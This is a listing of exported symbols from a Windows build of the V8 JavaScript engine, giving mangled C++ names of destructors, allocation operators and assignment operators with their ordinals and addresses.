                                                                                                                                                                                                                                    ??1StreamingDecoder@wasm@internal@v8@@UEAA@XZ15810x140639260
                                                                                                                                                                                                                                    ??1StreamingProcessor@wasm@internal@v8@@UEAA@XZ15820x1400971a0
                                                                                                                                                                                                                                    ??1StringBuffer@v8_inspector@@UEAA@XZ15830x1400971a0
                                                                                                                                                                                                                                    ??1StringTable@internal@v8@@QEAA@XZ15840x1408e3e90
                                                                                                                                                                                                                                    ??1StringsStorage@internal@v8@@QEAA@XZ15850x14085e360
                                                                                                                                                                                                                                    ??1SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@XZ15860x140c77a30
                                                                                                                                                                                                                                    ??1Sweeper@internal@cppgc@@QEAA@XZ15870x140506b90
                                                                                                                                                                                                                                    ??1SwitchBuilder@interpreter@internal@v8@@UEAA@XZ15880x140a32d30
                                                                                                                                                                                                                                    ??1SyncStreamingDecoder@wasm@internal@v8@@UEAA@XZ15890x1406675c0
                                                                                                                                                                                                                                    ??1Thread@base@v8@@UEAA@XZ15900x140ff3110
                                                                                                                                                                                                                                    ??1ThrowOnJavascriptExecution@internal@v8@@QEAA@XZ15910x140bda990
                                                                                                                                                                                                                                    ??1TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@UEAA@XZ15920x1400971a0
                                                                                                                                                                                                                                    ??1TracedValue@tracing@v8@@UEAA@XZ15930x1407bdae0
                                                                                                                                                                                                                                    ??1TryCatch@v8@@QEAA@XZ15940x140c77a50
                                                                                                                                                                                                                                    ??1TryCatchBuilder@interpreter@internal@v8@@UEAA@XZ15950x140a32d70
                                                                                                                                                                                                                                    ??1TryFinallyBuilder@interpreter@internal@v8@@UEAA@XZ15960x140a32dc0
                                                                                                                                                                                                                                    ??1TurboAssembler@internal@v8@@UEAA@XZ15970x1405593f0
                                                                                                                                                                                                                                    ??1TurboAssemblerBase@internal@v8@@UEAA@XZ15980x1405593f0
                                                                                                                                                                                                                                    ??1TypeCache@compiler@internal@v8@@QEAA@XZ15990x14115a6c0
                                                                                                                                                                                                                                    ??1TypeNarrowingReducer@compiler@internal@v8@@UEAA@XZ16000x141200d90
                                                                                                                                                                                                                                    ??1TypeProfile@debug@v8@@QEAA@XZ16010x14009b260
                                                                                                                                                                                                                                    ??1TypedOptimization@compiler@internal@v8@@UEAA@XZ16020x141201dd0
                                                                                                                                                                                                                                    ??1TypedSlotSet@internal@v8@@UEAA@XZ16030x140538ed0
                                                                                                                                                                                                                                    ??1TypedSlots@internal@v8@@UEAA@XZ16040x140a9cd50
                                                                                                                                                                                                                                    ??1Typer@compiler@internal@v8@@QEAA@XZ16050x141205590
                                                                                                                                                                                                                                    ??1UnifiedHeapMarkingVerifier@internal@v8@@UEAA@XZ16060x14050fec0
                                                                                                                                                                                                                                    ??1UnifiedHeapMarkingVisitorBase@internal@v8@@UEAA@XZ16070x1400971a0
                                                                                                                                                                                                                                    ??1Unlocker@v8@@QEAA@XZ16080x140b56d00
                                                                                                                                                                                                                                    ??1UnoptimizedCompilationInfo@internal@v8@@QEAA@XZ16090x14073e5c0
                                                                                                                                                                                                                                    ??1UnoptimizedCompileState@internal@v8@@QEAA@XZ16100x140538ee0
                                                                                                                                                                                                                                    ??1Utf8Value@String@v8@@QEAA@XZ16110x140c77bc0
                                                                                                                                                                                                                                    ??1V8HeapExplorer@internal@v8@@UEAA@XZ16120x1407f63a0
                                                                                                                                                                                                                                    ??1V8Inspector@v8_inspector@@UEAA@XZ16130x1400971a0
                                                                                                                                                                                                                                    ??1V8InspectorClient@v8_inspector@@UEAA@XZ16140x1400971a0
                                                                                                                                                                                                                                    ??1V8InspectorSession@v8_inspector@@UEAA@XZ16150x1400971a0
                                                                                                                                                                                                                                    ??1V8StackTrace@v8_inspector@@UEAA@XZ16160x1400971a0
                                                                                                                                                                                                                                    ??1Value@String@v8@@QEAA@XZ16170x140c77bc0
                                                                                                                                                                                                                                    ??1ValueDeserializer@v8@@QEAA@XZ16180x140c77bd0
                                                                                                                                                                                                                                    ??1ValueNumberingReducer@compiler@internal@v8@@UEAA@XZ16190x14120d5d0
                                                                                                                                                                                                                                    ??1ValueSerializer@v8@@QEAA@XZ16200x140c77c00
                                                                                                                                                                                                                                    ??1VirtualAddressSpace@base@v8@@UEAA@XZ16210x1400971a0
                                                                                                                                                                                                                                    ??1VirtualAddressSubspace@base@v8@@UEAA@XZ16220x140ffbe90
                                                                                                                                                                                                                                    ??1VirtualMemory@internal@cppgc@@QEAA@XZ16230x140504ca0
                                                                                                                                                                                                                                    ??1VirtualMemory@internal@v8@@QEAA@XZ16240x1407bc4d0
                                                                                                                                                                                                                                    ??1Visitor@cppgc@@UEAA@XZ16250x1400971a0
                                                                                                                                                                                                                                    ??1WasmCode@wasm@internal@v8@@QEAA@XZ16260x14065d5e0
                                                                                                                                                                                                                                    ??1WasmCodeManager@wasm@internal@v8@@QEAA@XZ16270x14065d700
                                                                                                                                                                                                                                    ??1WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ16280x14065d780
                                                                                                                                                                                                                                    ??1WasmEngine@wasm@internal@v8@@QEAA@XZ16290x14064a4a0
                                                                                                                                                                                                                                    ??1WasmError@wasm@internal@v8@@QEAA@XZ16300x14061cd50
                                                                                                                                                                                                                                    ??1WasmFunctionBuilder@wasm@internal@v8@@QEAA@XZ16310x1406330f0
                                                                                                                                                                                                                                    ??1WasmGraphBuilder@compiler@internal@v8@@QEAA@XZ16320x1410714e0
                                                                                                                                                                                                                                    ??1WasmModule@wasm@internal@v8@@QEAA@XZ16330x140538f20
                                                                                                                                                                                                                                    ??1WasmModuleBuilder@wasm@internal@v8@@QEAA@XZ16340x1406331a0
                                                                                                                                                                                                                                    ??1WasmModuleObjectBuilderStreaming@v8@@QEAA@XZ16350x140098580
                                                                                                                                                                                                                                    ??1WasmModuleSourceMap@wasm@internal@v8@@QEAA@XZ16360x1405395d0
                                                                                                                                                                                                                                    ??1WasmSerializer@wasm@internal@v8@@QEAA@XZ16370x14061cdb0
                                                                                                                                                                                                                                    ??1WasmStreaming@v8@@QEAA@XZ16380x1406392f0
                                                                                                                                                                                                                                    ??1WeakCodeRegistry@internal@v8@@QEAA@XZ16390x14085c9d0
                                                                                                                                                                                                                                    ??1WebSnapshotDeserializer@internal@v8@@QEAA@XZ16400x1407af000
                                                                                                                                                                                                                                    ??1WebSnapshotSerializer@internal@v8@@QEAA@XZ16410x1407af040
                                                                                                                                                                                                                                    ??1Zone@internal@v8@@QEAA@XZ16420x1407ae270
                                                                                                                                                                                                                                    ??1ZoneStats@compiler@internal@v8@@QEAA@XZ16430x1411d2ed0
                                                                                                                                                                                                                                    ??2AlignedSlotAllocator@internal@v8@@CAPEAX_K@Z16440x1405396d0
                                                                                                                                                                                                                                    ??2ErrorThrower@wasm@internal@v8@@CAPEAX_K@Z16450x1405396d0
                                                                                                                                                                                                                                    ??2EscapableHandleScope@v8@@CAPEAX_K@Z16460x1405396d0
                                                                                                                                                                                                                                    ??2GlobalGCInfoTable@internal@cppgc@@CAPEAX_K@Z16470x1405396d0
                                                                                                                                                                                                                                    ??2HandleScope@v8@@CAPEAX_K@Z16480x1405396d0
                                                                                                                                                                                                                                    ??2Isolate@internal@v8@@CAPEAX_KPEAX@Z16490x140097130
                                                                                                                                                                                                                                    ??2Malloced@internal@v8@@SAPEAX_K@Z16500x1407bc5e0
                                                                                                                                                                                                                                    ??2Node@compiler@internal@v8@@CAPEAX_KPEAX@Z16510x140097130
                                                                                                                                                                                                                                    ??2Register@interpreter@internal@v8@@CAPEAX_K@Z16520x1405396d0
                                                                                                                                                                                                                                    ??2SamplingEventsProcessor@internal@v8@@SAPEAX_K@Z16530x14087aa00
                                                                                                                                                                                                                                    ??2SealHandleScope@v8@@CAPEAX_K@Z16540x1405396d0
                                                                                                                                                                                                                                    ??2TryCatch@v8@@CAPEAX_K@Z16550x1405396d0
                                                                                                                                                                                                                                    ??3AlignedSlotAllocator@internal@v8@@CAXPEAX_K@Z16560x1405396d0
                                                                                                                                                                                                                                    ??3BackingStore@v8@@SAXPEAX@Z16570x140097860
                                                                                                                                                                                                                                    ??3CompilationState@wasm@internal@v8@@SAXPEAX@Z16580x140097860
                                                                                                                                                                                                                                    ??3ErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z16590x1405396d0
                                                                                                                                                                                                                                    ??3EscapableHandleScope@v8@@CAXPEAX_K@Z16600x1405396d0
                                                                                                                                                                                                                                    ??3GlobalGCInfoTable@internal@cppgc@@CAXPEAX_K@Z16610x1405396d0
                                                                                                                                                                                                                                    ??3HandleScope@v8@@CAXPEAX_K@Z16620x1405396d0
                                                                                                                                                                                                                                    ??3Malloced@internal@v8@@SAXPEAX@Z16630x14021d030
                                                                                                                                                                                                                                    ??3Register@interpreter@internal@v8@@CAXPEAX_K@Z16640x1405396d0
                                                                                                                                                                                                                                    ??3SamplingEventsProcessor@internal@v8@@SAXPEAX@Z16650x14087aa10
                                                                                                                                                                                                                                    ??3SealHandleScope@v8@@CAXPEAX_K@Z16660x1405396d0
                                                                                                                                                                                                                                    ??3TryCatch@v8@@CAXPEAX_K@Z16670x1405396d0
                                                                                                                                                                                                                                    ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16680x140097a90
                                                                                                                                                                                                                                    ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16690x140097a90
                                                                                                                                                                                                                                    ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16700x140097a90
                                                                                                                                                                                                                                    ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16710x140097a90
                                                                                                                                                                                                                                    ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16720x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@AEBV012@@Z16730x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16740x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16750x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16760x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16770x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16780x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16790x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VString@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16800x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@V?$Handle@VString@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16810x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16820x1400972c0
                                                                                                                                                                                                                                    ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16830x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@H$S@v8@@QEAAAEAV01@$$QEAV01@@Z16840x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@H$S@v8@@QEAAAEAV01@AEBV01@@Z16850x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@I$S@v8@@QEAAAEAV01@$$QEAV01@@Z16860x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@I$S@v8@@QEAAAEAV01@AEBV01@@Z16870x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@M$S@v8@@QEAAAEAV01@$$QEAV01@@Z16880x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@M$S@v8@@QEAAAEAV01@AEBV01@@Z16890x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@N$S@v8@@QEAAAEAV01@$$QEAV01@@Z16900x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@N$S@v8@@QEAAAEAV01@AEBV01@@Z16910x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@V?$Local@VValue@v8@@@v8@@$S@v8@@QEAAAEAV01@$$QEAV01@@Z16920x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@V?$Local@VValue@v8@@@v8@@$S@v8@@QEAAAEAV01@AEBV01@@Z16930x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@X$S@v8@@QEAAAEAV01@$$QEAV01@@Z16940x1400972c0
                                                                                                                                                                                                                                    ??4?$CTypeInfoBuilder@X$S@v8@@QEAAAEAV01@AEBV01@@Z16950x1400972c0
                                                                                                                                                                                                                                    ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16960x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16970x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16980x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16990x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17000x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17010x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17020x140097a90
                                                                                                                                                                                                                                    ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17030x140097a90
                                                                                                                                                                                                                                    ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17040x1400972c0
                                                                                                                                                                                                                                    ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17050x1400972c0
                                                                                                                                                                                                                                    ??4?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17060x1400972c0
                                                                                                                                                                                                                                    ??4?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17070x1400972c0
                                                                                                                                                                                                                                    ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17080x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17090x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17100x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17110x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17120x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17130x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17140x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17150x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17160x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17170x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17180x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17190x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17200x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17210x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17220x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17230x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17240x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17250x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17260x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17270x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17280x140097a90
                                                                                                                                                                                                                                    ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17290x140097a90
                                                                                                                                                                                                                                    ??4?$HeapVisitor@VMarkingVerifierBase@internal@cppgc@@@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z17300x1400972c0
                                                                                                                                                                                                                                    ??4?$HeapVisitor@VMarkingVerifierBase@internal@cppgc@@@internal@cppgc@@QEAAAEAV012@AEBV012@@Z17310x1400972c0
                                                                                                                                                                                                                                    ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@$$QEAU012@@Z17320x14053a150
                                                                                                                                                                                                                                    ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@AEBU012@@Z17330x14053a170
                                                                                                                                                                                                                                    ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@$$QEAU012@@Z17340x1412a03e0
                                                                                                                                                                                                                                    ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@AEBU012@@Z17350x140097880
                                                                                                                                                                                                                                    ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17360x1400972c0
                                                                                                                                                                                                                                    ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17370x1400972c0
                                                                                                                                                                                                                                    ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17380x1400972c0
                                                                                                                                                                                                                                    ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17390x1400972c0
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@$$QEAV01@@Z17400x140097ca0
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@AEBV01@@Z17410x140097880
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@$$QEAV01@@Z17420x140097ca0
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@AEBV01@@Z17430x140097880
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAAAEAV01@$$QEAV01@@Z17440x140097ca0
                                                                                                                                                                                                                                    ??4?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAAAEAV01@AEBV01@@Z17450x140097880
                                                                                                                                                                                                                                    ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17460x140097a90
                                                                                                                                                                                                                                    ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17470x140097a90
                                                                                                                                                                                                                                    ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17480x140097a90
                                                                                                                                                                                                                                    ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17490x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17500x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@AEBV012@@Z17510x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17520x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@AEBV012@@Z17530x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17540x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAAEAV012@AEBV012@@Z17550x140097a90
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17560x1400972c0
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17570x1400972c0
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17580x1400972c0
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17590x1400972c0
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17600x1400972c0
                                                                                                                                                                                                                                    ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z17610x1400972c0
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17620x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17630x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17640x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17650x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17660x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17670x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17680x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17690x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17700x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17710x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17720x140097a90
                                                                                                                                                                                                                                    ??4?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17730x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17740x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17750x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@V423@@Z17760x140097ad0
                                                                                                                                                                                                                                    ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17770x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17780x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@V423@@Z17790x140097ad0
                                                                                                                                                                                                                                    ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17800x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17810x140097a90
                                                                                                                                                                                                                                    ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@V423@@Z17820x140097ad0
                                                                                                                                                                                                                                    ??4?$TorqueGeneratedFactory@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17830x1400972c0
                                                                                                                                                                                                                                    ??4?$TorqueGeneratedFactory@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17840x1400972c0
                                                                                                                                                                                                                                    ??4?$TorqueGeneratedFactory@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17850x1400972c0
                                                                                                                                                                                                                                    ??4?$TorqueGeneratedFactory@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17860x1400972c0
                                                                                                                                                                                                                                    ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17870x14057e2c0
                                                                                                                                                                                                                                    ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17880x14057e2e0
